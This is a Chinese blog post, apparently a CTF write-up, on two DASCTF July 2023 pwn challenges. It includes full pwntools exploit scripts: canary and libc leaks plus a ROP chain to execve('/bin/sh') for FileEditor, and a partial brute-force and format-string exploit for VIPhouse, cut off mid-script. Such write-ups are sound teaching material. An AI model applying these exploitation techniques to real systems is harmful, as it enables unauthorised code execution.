

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="l1s00t">
  <meta name="keywords" content="">
  
    <meta name="description" content="2023-dasctf7月部分复现-pwnFileEditor这个题在比赛时始终没找到漏洞，真栓Q。 查看保护。  题目维护了一个简单的结构体。 123456struct file&amp;#123;  int flag;  char content[204];  file *next;&amp;#125;;  题目有很多复杂的功能，做到了文件的增删改查，以及字符串的查找与替换。 题目漏洞点是，在查找字符串是存在">
<meta property="og:type" content="article">
<meta property="og:title" content="2023-dasctf7月部分复现-pwn">
<meta property="og:url" content="http://example.com/2023/07/23/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="2023-dasctf7月部分复现-pwnFileEditor这个题在比赛时始终没找到漏洞，真栓Q。 查看保护。  题目维护了一个简单的结构体。 123456struct file&amp;#123;  int flag;  char content[204];  file *next;&amp;#125;;  题目有很多复杂的功能，做到了文件的增删改查，以及字符串的查找与替换。 题目漏洞点是，在查找字符串是存在">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725153648174.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725154049407.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725154201384.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725153246138.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101042326.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101623749.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101254804.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101559124.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725100912317.png">
<meta property="og:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101007541.png">
<meta property="article:published_time" content="2023-07-23T12:48:43.000Z">
<meta property="article:modified_time" content="2023-07-25T08:09:54.174Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725153648174.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>2023-dasctf7月部分复现-pwn - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>l1s00t</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="2023-dasctf7月部分复现-pwn"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-07-23 20:48" pubdate>
          2023年7月23日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          23 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">2023-dasctf7月部分复现-pwn</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2023年7月25日 下午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h1 id="2023-dasctf7月部分复现-pwn"><a href="#2023-dasctf7月部分复现-pwn" class="headerlink" title="2023-dasctf7月部分复现-pwn"></a>2023-dasctf7月部分复现-pwn</h1><h2 id="FileEditor"><a href="#FileEditor" class="headerlink" title="FileEditor"></a>FileEditor</h2><p>这个题在比赛时始终没找到漏洞，真栓Q。</p>
<p>查看保护。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725153648174.png" srcset="/img/loading.gif" lazyload alt="image-20230725153648174"></p>
<p>题目维护了一个简单的结构体。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">file</span></span><br><span class="hljs-class">&#123;</span><br>  <span class="hljs-type">int</span> flag;<br>  <span class="hljs-type">char</span> content[<span class="hljs-number">204</span>];<br>  file *next;<br>&#125;;<br></code></pre></td></tr></table></figure>

<p>题目有很多复杂的功能，做到了文件的增删改查，以及字符串的查找与替换。</p>
<p>题目漏洞点是，在查找字符串是存在栈溢出。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725154049407.png" srcset="/img/loading.gif" lazyload alt="image-20230725154049407"></p>
<p>这么明显都没看到，果然我还是该锻炼锻炼眼力了。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725154201384.png" srcset="/img/loading.gif" lazyload alt="image-20230725154201384"></p>
<p>这个函数也是千奇百怪的，明显是为了出题而设计的。无语。。。</p>
<p>解题思路如下：</p>
<ol>
<li>利用查找字符串功能，将栈中内容复制到content中</li>
<li>利用修改功能，逐个覆盖’\x00’为’\n’，泄露canary，以及libc地址</li>
<li>直接打rop链</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><br>fn = <span class="hljs-string">&#x27;./pwn&#x27;</span><br>elf = ELF(fn)<br>libc = ELF(<span class="hljs-string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)<br><br>debug = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> debug:<br>    p = process(fn)<br><span class="hljs-keyword">else</span>:<br>    p = remote(<span class="hljs-string">&#x27;node4.buuoj.cn&#x27;</span>, <span class="hljs-number">29655</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>(<span class="hljs-params">s=<span class="hljs-string">&#x27;&#x27;</span></span>):<br>    <span class="hljs-keyword">if</span> debug:<br>        gdb.attach(p, s)<br>        pause()<br><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">pass</span><br><br>lg = <span class="hljs-keyword">lambda</span> x, y: log.success(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;x&#125;</span>: <span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(y)&#125;</span>&#x27;</span>)<br><br>    <br><span class="hljs-keyword">def</span> <span class="hljs-title function_">menu</span>(<span class="hljs-params">index</span>):<br>    p.sendlineafter(<span class="hljs-string">&#x27;&gt; choose:&#x27;</span>, <span class="hljs-built_in">str</span>(index))<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dasopen</span>():<br>    menu(<span class="hljs-number">1</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">show</span>():<br>    menu(<span class="hljs-number">2</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">insert</span>(<span class="hljs-params">line, nums, content: <span class="hljs-built_in">list</span></span>):<br>    menu(<span class="hljs-number">3</span>)<br>    p.sendlineafter(<span class="hljs-string">&#x27;please enter n m:&#x27;</span>, <span class="hljs-built_in">str</span>(line))<br>    p.sendline(<span class="hljs-built_in">str</span>(nums))<br>    p.recvuntil(<span class="hljs-string">&#x27;be inserted in sequence:&#x27;</span>)<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(nums):<br>        p.sendline(content[i])<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">delete</span>(<span class="hljs-params">pos, nums</span>):<br>    menu(<span class="hljs-number">4</span>)<br>    p.recvuntil(<span class="hljs-string">&#x27;lines to delete&#x27;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(pos))<br>    p.sendline(<span class="hljs-built_in">str</span>(nums))<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">modify</span>(<span class="hljs-params">line, content</span>):<br>    menu(<span class="hljs-number">6</span>)<br>    p.sendlineafter(<span class="hljs-string">&#x27;number to be modified:&#x27;</span>, <span class="hljs-built_in">str</span>(line))<br>    p.sendlineafter(<span class="hljs-string">&#x27;new content:&#x27;</span>, content)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">find</span>(<span class="hljs-params">search</span>):<br>    menu(<span class="hljs-number">7</span>)<br>    p.sendlineafter(<span class="hljs-string">&#x27;string to search for:&#x27;</span>, search)<br>    p.sendlineafter(<span class="hljs-string">&#x27;continue searching? (y/n)&#x27;</span>, <span class="hljs-string">&#x27;n&#x27;</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">save</span>():<br>    menu(<span class="hljs-number">9</span>)<br><br><br>dasopen()<br><br>insert(<span class="hljs-number">1</span>, <span class="hljs-number">1</span>, [<span class="hljs-string">&#x27;a&#x27;</span> * <span class="hljs-number">0x62</span> + <span class="hljs-string">&#x27;l1s00t&#x27;</span>])<br><br>find(<span class="hljs-string">&#x27;l1s00t&#x27;</span>)<br><br>modify(<span class="hljs-number">1</span>, <span class="hljs-string">&#x27;a&#x27;</span> * <span class="hljs-number">0x62</span> + <span class="hljs-string">&#x27;l1s00t&#x27;</span>)<br>show()<br>p.recvuntil(<span class="hljs-string">&#x27;l1s00t&#x27;</span>)<br>canary = u64(p.recv(<span class="hljs-number">8</span>)) &gt;&gt; <span class="hljs-number">8</span> &lt;&lt; <span class="hljs-number">8</span><br>lg(<span class="hljs-string">&#x27;canary&#x27;</span>, canary)<br><br>modify(<span class="hljs-number">1</span>, <span class="hljs-string">&#x27;a&#x27;</span> * <span class="hljs-number">0x72</span> + <span class="hljs-string">&#x27;l1s00t&#x27;</span>)<br>show()<br>p.recvuntil(<span class="hljs-string">&#x27;l1s00t&#x27;</span>)<br>code_base = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)) &gt;&gt; <span class="hljs-number">8</span> &lt;&lt; <span class="hljs-number">8</span><br>code_base = code_base - <span class="hljs-number">0x1500</span><br>lg(<span class="hljs-string">&#x27;code_base&#x27;</span>, code_base)<br><br>modify(<span class="hljs-number">1</span>, <span class="hljs-string">&#x27;a&#x27;</span> * <span class="hljs-number">0xa8</span>)<br>show()<br>libc_base = u64(p.recvuntil(<span class="hljs-string">&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)) &gt;&gt; <span class="hljs-number">8</span> &lt;&lt; <span class="hljs-number">8</span><br>libc_base = libc_base - <span class="hljs-number">0x24000</span><br>lg(<span class="hljs-string">&#x27;libc_base&#x27;</span>, libc_base)<br><br>system = libc_base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]<br>execve = libc_base + libc.sym[<span class="hljs-string">&#x27;execve&#x27;</span>]<br><br>pop_rdi_ret = code_base + <span class="hljs-number">0x0000000000002ac3</span><br>pop_rsi_ret = libc_base + <span class="hljs-number">0x000000000002601f</span><br>pop_rdx_ret = libc_base + <span class="hljs-number">0x0000000000142c92</span><br><br>payload = flat(<br>    &#123;<br>        <span class="hljs-number">0x62</span>: <span class="hljs-string">&#x27;l1s00t&#x27;</span>,<br>        <span class="hljs-number">0x68</span>: [<br>            canary, <span class="hljs-number">0</span>,<br>            pop_rdi_ret, libc_base + libc.search(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>).__next__(),<br>            pop_rsi_ret, <span class="hljs-number">0</span>,<br>            pop_rdx_ret, <span class="hljs-number">0</span>,<br>            execve<br>        ]<br>    &#125;<br>)<br>insert(<span class="hljs-number">1</span>, <span class="hljs-number">1</span>, [payload])<br><br><span class="hljs-comment"># dbg()</span><br><br>find(<span class="hljs-string">&#x27;l1s00t&#x27;</span>)<br><br>p.interactive()<br><br></code></pre></td></tr></table></figure>

<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725153246138.png" srcset="/img/loading.gif" lazyload alt="image-20230725153246138"></p>
<h2 id="VIPhouse"><a href="#VIPhouse" class="headerlink" title="VIPhouse"></a>VIPhouse</h2><p>这个题栽在了泄露随机字符上。一直在想怎么覆盖掉随机字符，从而绕过检测。没想到师傅们是直接爆破1byte绕过的。</p>
<p>查看保护。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101042326.png" srcset="/img/loading.gif" lazyload alt="image-20230725101042326"></p>
<p>使用打开文件的方式写入随机数，无法预测。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101623749.png" srcset="/img/loading.gif" lazyload alt="image-20230725101623749"></p>
<p>使用<code>strcpy</code>将随机字符放入栈中，可以想到首字节’\x00’绕过，这样后续的字符也为’\x00’了。所以说，相当于爆破首字节为’\x00’。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101254804.png" srcset="/img/loading.gif" lazyload alt="image-20230725101254804"></p>
<p>login函数存在栈溢出。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725101559124.png" srcset="/img/loading.gif" lazyload alt="image-20230725101559124"></p>
<p>注意到login比较的时候，把我们输入的字符串放到了rdi的位置。</p>
<p><img src="/img/2023-dasctf7%E6%9C%88%E9%83%A8%E5%88%86%E5%A4%8D%E7%8E%B0-pwn/image-20230725100912317.png" srcset="/img/loading.gif" lazyload alt="image-20230725100912317"></p>
<p>同时，能够找到一个比较好用的gadget。两者结合，可以触发格式化字符串漏洞。</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs x86asm">00000000004016<span class="hljs-built_in">DD</span> <span class="hljs-keyword">mov</span> <span class="hljs-built_in">eax</span>, <span class="hljs-number">0</span><span class="hljs-comment">; call _printf; nop; pop rbp; retn</span><br></code></pre></td></tr></table></figure>

<p>可以直接打格式化字符串那一套，也可以利用格式化字符串泄露地址，构造rop链。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python</span><br><span class="hljs-comment">#encoding:utf-8</span><br><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br><span class="hljs-comment"># context.log_level = &#x27;debug&#x27;</span><br><br>fn = <span class="hljs-string">&#x27;./viphouse&#x27;</span><br>elf = ELF(fn)<br>libc = ELF(<span class="hljs-string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)<br><br>debug = <span class="hljs-number">1</span><br><span class="hljs-comment"># if debug:</span><br><span class="hljs-comment">#     p = process(fn)</span><br><br><span class="hljs-comment"># else:</span><br><span class="hljs-comment">#     p = remote()</span><br>    <br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>(<span class="hljs-params">s=<span class="hljs-string">&#x27;&#x27;</span></span>):<br>    <span class="hljs-keyword">if</span> debug:<br>        gdb.attach(p, s)<br>        pause()<br><br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">pass</span><br>    <br>lg = <span class="hljs-keyword">lambda</span> x, y: log.success(<span class="hljs-string">f&#x27;<span class="hljs-subst">&#123;x&#125;</span>: <span class="hljs-subst">&#123;<span class="hljs-built_in">hex</span>(y)&#125;</span>&#x27;</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">menu</span>(<span class="hljs-params">index</span>):<br>    p.sendlineafter(<span class="hljs-string">&#x27;an option: &#x27;</span>, <span class="hljs-built_in">str</span>(index))<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">login</span>(<span class="hljs-params">name, payload</span>):<br>    menu(<span class="hljs-number">1</span>)<br>    p.sendlineafter(<span class="hljs-string">&#x27;your username: &#x27;</span>, name)<br>    p.sendlineafter(<span class="hljs-string">&#x27;your password: &#x27;</span>, payload)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">leak_canary</span>():<br>    menu(<span class="hljs-number">4</span>)<br>    p.sendafter(<span class="hljs-string">&#x27;number you guess: &#x27;</span>, <span class="hljs-string">&#x27;\x00&#x27;</span> * <span class="hljs-number">0x10</span>)<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">logout</span>():<br>    menu(<span class="hljs-number">5</span>)<br><br><span class="hljs-keyword">while</span> <span class="hljs-literal">True</span>:<br>    p = process(fn)<br>    login(<span class="hljs-string">&#x27;admin\x00&#x27;</span>, <span class="hljs-string">&#x27;root\x00&#x27;</span>)<br>    leak_canary()<br>    result = p.recvuntil(<span class="hljs-string">&#x27;1. login in&#x27;</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-string">b&#x27;gift&#x27;</span> <span class="hljs-keyword">in</span> result:<br>        <span class="hljs-keyword">break</span><br>    <span class="hljs-keyword">else</span>:<br>        p.close()<br><br><br>start = <span class="hljs-number">0x4012d0</span><br><br><span class="hljs-comment"># 00000000004016DD mov eax, 0; call _printf; nop; pop rbp; retn</span><br>myprintf = <span class="hljs-number">0x4016DD</span><br><br>pop_rbp_ret = <span class="hljs-number">0x000000000040139d</span><br>leave_ret = <span 